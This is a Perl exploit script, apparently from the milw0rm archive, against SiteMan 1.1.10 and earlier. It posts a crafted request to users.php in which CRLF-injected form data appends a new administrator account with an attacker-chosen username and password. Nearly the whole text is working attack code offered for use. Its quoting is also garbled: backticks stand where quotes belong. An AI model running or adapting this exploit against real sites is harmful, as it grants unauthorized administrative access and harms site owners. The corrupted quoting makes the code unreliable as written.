Siteman <= 1.1.10 Remote Administrative Account Addition Exploit#!/usr/bin/perl -w # # Exploit by Noam Rathaus - Beyond Security Ltd. # Exploit for the SiteMan vulnerability discovered by: `amironline452` # use Digest::MD5 qw(md5 md5_hex md5_base64); use IO::Socket; use strict; # ./siteman.pl / vulnerable.host my $Path = shift; my $Host = shift; my $Username = shift; my $Password = md5_hex(shift); print `Path: $Path\nHost: $Host\nUsername: $Username\nPassword: $Password\n`; my $content = `do=docreate&line=%0A%0D$Username|$Password|5|$Username\@hacked.com|`. `$Username|1105956827|$Username|$Password|0|0|0|hackers%0A%0D`; my $request = `POST $Path/users.php HTTP/1.1\r Host: $Host\r User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040928 Firefox/0.9.3\r Accept: text/html;q=0.9,text/plain;q=0.8,*/*;q=0.5\r Accept-Language: en-us,en;q=0.5\r Accept-Encoding: gzip,deflate\r Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r Content-Length: `.length($content).`\r Content-Type: application/x-www-form-urlencoded\r Connection: close\r \r $content`; my $remote = IO::Socket::INET->new ( Proto => `tcp`, PeerAddr => $Host, PeerPort => `8080`); unless ($remote) { die `cannot connect to http daemon on $Host` } print `connected\n`; print `request: [$request]\n`; print $remote $request. `\r\n`; while (<$remote>) { print $_; } close ($remote); print `\n\n--- done ---\n`; # milw0rm.com [2005-01-25]